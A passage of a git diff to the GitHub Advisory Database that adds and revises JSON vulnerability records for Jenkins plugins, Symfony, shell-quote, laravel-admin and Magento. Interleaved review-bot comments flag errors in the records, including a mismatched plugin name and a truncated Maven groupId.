b/advisories/github-reviewed/2022/05/GHSA-fcmh-7492-g4q9/GHSA-fcmh-7492-g4q9.json 
@@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fcmh-7492-g4q9", + "modified": "2024-02-01T21:23:27Z", + "published": "2022-05-24T16:58:33Z", + "aliases": [ + "CVE-2019-17433" + ], + "summary": "z-song laravel-admin XSS via the Slug or Name on the Roles screen", + "details": "z-song laravel-admin 1.7.3 has XSS via the Slug or Name on the Roles screen, because of mishandling on the \"Operation log\" screen.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "encore/laravel-admin" + }, + "versions": [ + "1.7.3" + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17433" + }, + { + "type": "WEB", + "url": "https://github.com/z-song/laravel-admin/issues/3847" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:23:27Z", + "nvd_published_at": "2019-10-10T12:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-ffj8-w4rj-vr7v/GHSA-ffj8-w4rj-vr7v.json b/advisories/github-reviewed/2022/05/GHSA-ffj8-w4rj-vr7v/GHSA-ffj8-w4rj-vr7v.json new file mode 100644 index 0000000000000..15e19d86a7869 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-ffj8-w4rj-vr7v/GHSA-ffj8-w4rj-vr7v.json 
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ffj8-w4rj-vr7v", + "modified": "2024-01-30T21:57:55Z", + "published": "2022-05-13T01:15:08Z", + "aliases": [ + "CVE-2019-1003045" + ], + "summary": "ECS Publisher Plugin stored and displayed API token in plain text", + "details": "A vulnerability in Jenkins ECS Publisher Plugin 1.0.0 and earlier allows attackers with Item/Extended Read permission, or local file system access to the Jenkins home directory to obtain the API token configured in this plugin's configuration.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "de.eacg:ecs-publisher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.0.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003045" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-03-25/#SECURITY-846" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/03/28/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107628" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:57:55Z", + "nvd_published_at": "2019-03-28T18:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-ffv8-x822-fx73/GHSA-ffv8-x822-fx73.json b/advisories/github-reviewed/2022/05/GHSA-ffv8-x822-fx73/GHSA-ffv8-x822-fx73.json new file mode 100644 index 0000000000000..61a4b0ab892e8 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-ffv8-x822-fx73/GHSA-ffv8-x822-fx73.json 
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ffv8-x822-fx73", + "modified": "2024-01-30T22:00:54Z", + "published": "2022-05-13T01:25:15Z", + "aliases": [ + "CVE-2019-1003096" + ], + "summary": "Jenkins TestFairy Plugin stores credentials in plain text", + "details": "Jenkins TestFairy Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:TestFairy" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.17.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.16" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003096" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1062" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:00:54Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-fhgg-j92h-29rc/GHSA-fhgg-j92h-29rc.json b/advisories/github-reviewed/2022/05/GHSA-fhgg-j92h-29rc/GHSA-fhgg-j92h-29rc.json new file mode 100644 index 0000000000000..6a05feaff9909 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-fhgg-j92h-29rc/GHSA-fhgg-j92h-29rc.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fhgg-j92h-29rc", + "modified": "2024-01-30T21:59:05Z", + "published": "2022-05-13T01:25:16Z", + "aliases": [ + "CVE-2019-1003091" + ], + "summary": "Missing permission check in Jenkins SOASTA CloudTest Plugin", + "details": "A missing permission check in Jenkins SOASTA CloudTest Plugin in the CloudTestServer.DescriptorImpl#doValidate form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.soasta.jenkins:cloudtest" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.25" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003091" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1054" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:59:05Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-fv7m-wc3v-wr3w/GHSA-fv7m-wc3v-wr3w.json b/advisories/github-reviewed/2022/05/GHSA-fv7m-wc3v-wr3w/GHSA-fv7m-wc3v-wr3w.json index fa18584478f97..c3ba310c762fd 100644 --- a/advisories/github-reviewed/2022/05/GHSA-fv7m-wc3v-wr3w/GHSA-fv7m-wc3v-wr3w.json +++ b/advisories/github-reviewed/2022/05/GHSA-fv7m-wc3v-wr3w/GHSA-fv7m-wc3v-wr3w.json 
@@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.12.0" }, { - "last_affected": "1.14.15" + "fixed": "1.14.16" } ] } @@ -40,6 +40,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-18121" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/simplesamlphp/simplesamlphp/CVE-2017-18121.yaml" + }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/02/msg00008.html" diff --git a/advisories/unreviewed/2022/05/GHSA-fvcf-wgxj-h7ch/GHSA-fvcf-wgxj-h7ch.json b/advisories/github-reviewed/2022/05/GHSA-fvcf-wgxj-h7ch/GHSA-fvcf-wgxj-h7ch.json similarity index 75% rename from advisories/unreviewed/2022/05/GHSA-fvcf-wgxj-h7ch/GHSA-fvcf-wgxj-h7ch.json rename to advisories/github-reviewed/2022/05/GHSA-fvcf-wgxj-h7ch/GHSA-fvcf-wgxj-h7ch.json index c000c2068f56a..baf05d51039dd 100644 --- a/advisories/unreviewed/2022/05/GHSA-fvcf-wgxj-h7ch/GHSA-fvcf-wgxj-h7ch.json +++ b/advisories/github-reviewed/2022/05/GHSA-fvcf-wgxj-h7ch/GHSA-fvcf-wgxj-h7ch.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-fvcf-wgxj-h7ch", - "modified": "2022-05-13T01:31:33Z", + "modified": "2024-01-30T22:26:32Z", "published": "2022-05-13T01:31:33Z", "aliases": [ "CVE-2019-10292" ], + "summary": "CSRF vulnerability in Jenkins Nomad Plugin allow SSRF", "details": "A cross-site request forgery vulnerability in Jenkins Kmap Plugin in KmapJenkinsBuilder.DescriptorImpl form validation methods allows attackers to initiate a connection to an attacker-specified server.", "severity": [ { @@ -14,7 +15,15 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "Maven", + "name": "rg.jenkins-ci.plugins:kmap-jenkins" + }, + "versions": [ + "1.6" + ] + } ], "references": [ { 
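Review bot: The summary added in the first hunk of GHSA-fvcf-wgxj-h7ch names the "Jenkins Nomad Plugin", but the details line, the CVE-2019-10292 alias and the affected package `kmap-jenkins` in the same record all describe the Kmap Plugin, so the summary appears to have been taken from a different advisory. The summary is the first thing dependents see in alerts and search results, so the product name should match the rest of the record; suggest `"summary": "CSRF vulnerability in Jenkins Kmap Plugin allows SSRF"`, which also fixes the subject-verb agreement in `allow SSRF`.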
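Review bot: The affected package name `rg.jenkins-ci.plugins:kmap-jenkins` in the second hunk of GHSA-fvcf-wgxj-h7ch looks truncated: every other Jenkins Maven coordinate in this commit uses the `org.jenkins-ci.plugins` group (for example `org.jenkins-ci.plugins:TestFairy` and `org.jenkins-ci.plugins:open-stf`). A groupId that does not exist on Maven Central will never match a dependent's manifest, so the advisory would silently produce no alerts even though it is now marked `github_reviewed`. Presumably the intended line is `"name": "org.jenkins-ci.plugins:kmap-jenkins"`; please confirm against the plugin's POM. The bare `"versions": ["1.6"]` list flags exactly that one release, which is fine only if 1.6 is the sole published version; otherwise an `introduced`/`last_affected` range is safer.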
@@ -39,8 +48,8 @@ "CWE-352" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:26:32Z", "nvd_published_at": "2019-04-04T16:29:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-fx37-56v6-85q6/GHSA-fx37-56v6-85q6.json b/advisories/github-reviewed/2022/05/GHSA-fx37-56v6-85q6/GHSA-fx37-56v6-85q6.json index 6584f5248a409..41e80e6720a04 100644 --- a/advisories/github-reviewed/2022/05/GHSA-fx37-56v6-85q6/GHSA-fx37-56v6-85q6.json +++ b/advisories/github-reviewed/2022/05/GHSA-fx37-56v6-85q6/GHSA-fx37-56v6-85q6.json @@ -44,7 +44,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0" + "introduced": "3.1.0" }, { "fixed": "3.1.2" @@ -67,6 +67,10 @@ "type": "WEB", "url": "https://github.com/silverstripe/silverstripe-graphql/commit/db28f3075ae2335905f43ac808e9177497e354ff" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/graphql/CVE-2019-12437.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/silverstripe/silverstripe-graphql" diff --git a/advisories/github-reviewed/2022/05/GHSA-g2rp-qwrq-qqqq/GHSA-g2rp-qwrq-qqqq.json b/advisories/github-reviewed/2022/05/GHSA-g2rp-qwrq-qqqq/GHSA-g2rp-qwrq-qqqq.json new file mode 100644 index 0000000000000..e48a86ad29810 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-g2rp-qwrq-qqqq/GHSA-g2rp-qwrq-qqqq.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g2rp-qwrq-qqqq", + "modified": "2024-01-30T21:50:19Z", + "published": "2022-05-13T01:17:42Z", + "aliases": [ + "CVE-2019-1003094" + ], + "summary": "Jenkins Open STF Plugin stores credentials in plain text ", + "details": "Jenkins Open STF Plugin stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:open-stf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.0.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003094" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1059" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-311" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:50:19Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-g378-6fg4-gx3v/GHSA-g378-6fg4-gx3v.json b/advisories/github-reviewed/2022/05/GHSA-g378-6fg4-gx3v/GHSA-g378-6fg4-gx3v.json index f554fd00d6f9f..1ea2cdbf036df 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g378-6fg4-gx3v/GHSA-g378-6fg4-gx3v.json +++ b/advisories/github-reviewed/2022/05/GHSA-g378-6fg4-gx3v/GHSA-g378-6fg4-gx3v.json 
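Review bot: The `summary` value in this new record carries a trailing space (`"...stores credentials in plain text "`), which will appear verbatim in alert titles and makes exact-string matching on the advisory fragile; trim it to `"summary": "Jenkins Open STF Plugin stores credentials in plain text"`. Separately, this record classifies plaintext credential storage as `CWE-311`, while the otherwise parallel GHSA-ffv8-x822-fx73 added earlier in this commit uses `CWE-522` for the same weakness class; one of the two should probably be aligned so the CWE taxonomy stays consistent across the Jenkins plaintext-credential advisories.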
@@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8132" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8132.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-g3gj-632x-fhrh/GHSA-g3gj-632x-fhrh.json b/advisories/github-reviewed/2022/05/GHSA-g3gj-632x-fhrh/GHSA-g3gj-632x-fhrh.json new file mode 100644 index 0000000000000..1636e3098407d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-g3gj-632x-fhrh/GHSA-g3gj-632x-fhrh.json 
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3gj-632x-fhrh", + "modified": "2024-01-30T22:18:42Z", + "published": "2022-05-13T01:31:33Z", + "aliases": [ + "CVE-2019-1003028" + ], + "summary": "SSRF vulnerability due to missing permission check in Jenkins JMS Messaging Plugin", + "details": "A server-side request forgery vulnerability exists in Jenkins JMS Messaging Plugin 1.1.1 and earlier in SSLCertificateAuthenticationMethod.java, UsernameAuthenticationMethod.java that allows attackers with Overall/Read permission to have Jenkins connect to a JMS endpoint.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:jms-messaging" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.1.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003028" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-02-19/#SECURITY-1033" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107295" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:18:42Z", + "nvd_published_at": "2019-02-20T21:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-g3rg-cj5x-3vpf/GHSA-g3rg-cj5x-3vpf.json b/advisories/github-reviewed/2022/05/GHSA-g3rg-cj5x-3vpf/GHSA-g3rg-cj5x-3vpf.json new file mode 100644 index 0000000000000..a489353101076 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-g3rg-cj5x-3vpf/GHSA-g3rg-cj5x-3vpf.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3rg-cj5x-3vpf", + "modified": "2024-01-30T22:26:13Z", + "published": "2022-05-13T01:31:33Z", + "aliases": [ + "CVE-2019-10278" + ], + "summary": "CSRF vulnerability in jenkins-reviewbot Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins jenkins-reviewbot Plugin in the ReviewboardDescriptor#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:jenkins-reviewbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.4.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10278" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1091" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:26:13Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-g4g7-q726-v5hg/GHSA-g4g7-q726-v5hg.json b/advisories/github-reviewed/2022/05/GHSA-g4g7-q726-v5hg/GHSA-g4g7-q726-v5hg.json index 7c03da31d79f6..ede4a4319bd2f 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g4g7-q726-v5hg/GHSA-g4g7-q726-v5hg.json +++ b/advisories/github-reviewed/2022/05/GHSA-g4g7-q726-v5hg/GHSA-g4g7-q726-v5hg.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g4g7-q726-v5hg", - "modified": "2023-10-06T17:57:22Z", + "modified": "2024-02-08T19:30:02Z", "published": "2022-05-14T01:14:35Z", "aliases": [ "CVE-2018-11406" @@ -63,7 +63,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.3.0" + "introduced": "3.0.0" }, { "fixed": "3.3.17" 
@@ -109,6 +109,291 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.48" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.41" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.3.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.48" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.41" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.3.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.11" + } + 
] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.48" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.41" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.3.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.11" + } + ] + } + ] } ], "references": [ 
@@ -120,6 +405,22 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/319e1bdd43979d9c1559497de8d69adea28ab8d1" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-bundle/CVE-2018-11406.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2018-11406.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2018-11406.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2018-11406.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -140,6 +441,10 @@ "type": "WEB", "url": "https://symfony.com/blog/cve-2018-11406-csrf-token-fixation" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2018-11406" + }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4262" diff --git a/advisories/github-reviewed/2022/05/GHSA-g4rg-993r-mgx7/GHSA-g4rg-993r-mgx7.json b/advisories/github-reviewed/2022/05/GHSA-g4rg-993r-mgx7/GHSA-g4rg-993r-mgx7.json index b45581c841ee6..40bc7e887eab3 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g4rg-993r-mgx7/GHSA-g4rg-993r-mgx7.json +++ b/advisories/github-reviewed/2022/05/GHSA-g4rg-993r-mgx7/GHSA-g4rg-993r-mgx7.json 
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-g4rg-993r-mgx7", - "modified": "2023-09-11T22:27:13Z", + "modified": "2024-02-02T20:50:00Z", "published": "2022-05-24T19:18:27Z", "aliases": [ "CVE-2021-42740" ], "summary": "Improper Neutralization of Special Elements used in a Command in Shell-quote", - "details": "The shell-quote package before 1.7.3 for Node.js allows command injection. An attacker can inject unescaped shell metacharacters through a regex designed to support Windows drive letters. If the output of this package is passed to a real shell as a quoted argument to a command with `exec()`, an attacker can inject arbitrary commands. This is because the Windows drive letter regex character class is `{A-z]` instead of the correct `{A-Za-z]`. Several shell metacharacters exist in the space between capital letter Z and lower case letter a, such as the backtick character.", + "details": "The shell-quote package before 1.7.3 for Node.js allows command injection. An attacker can inject unescaped shell metacharacters through a regex designed to support Windows drive letters. If the output of this package is passed to a real shell as a quoted argument to a command with `exec()`, an attacker can inject arbitrary commands. This is because the Windows drive letter regex character class is `[A-z]` instead of the correct `[A-Za-z]`. Several shell metacharacters exist in the space between capital letter Z and lower case letter a, such as the backtick character.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2022/05/GHSA-g4rg-rw65-8hfg/GHSA-g4rg-rw65-8hfg.json b/advisories/github-reviewed/2022/05/GHSA-g4rg-rw65-8hfg/GHSA-g4rg-rw65-8hfg.json index 420701a9fdb4d..c243364336b02 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g4rg-rw65-8hfg/GHSA-g4rg-rw65-8hfg.json +++ b/advisories/github-reviewed/2022/05/GHSA-g4rg-rw65-8hfg/GHSA-g4rg-rw65-8hfg.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g4rg-rw65-8hfg", - "modified": "2023-10-06T18:00:13Z", + "modified": "2024-02-08T19:28:13Z", "published": "2022-05-14T01:22:27Z", "aliases": [ "CVE-2018-11385" @@ -63,7 +63,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.3.0" + "introduced": "3.0.0" }, { "fixed": "3.3.17" 
@@ -109,6 +109,196 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.48" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.41" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.3.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.48" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.41" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.3.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.11" + } + ] + } + ] + }, + { + 
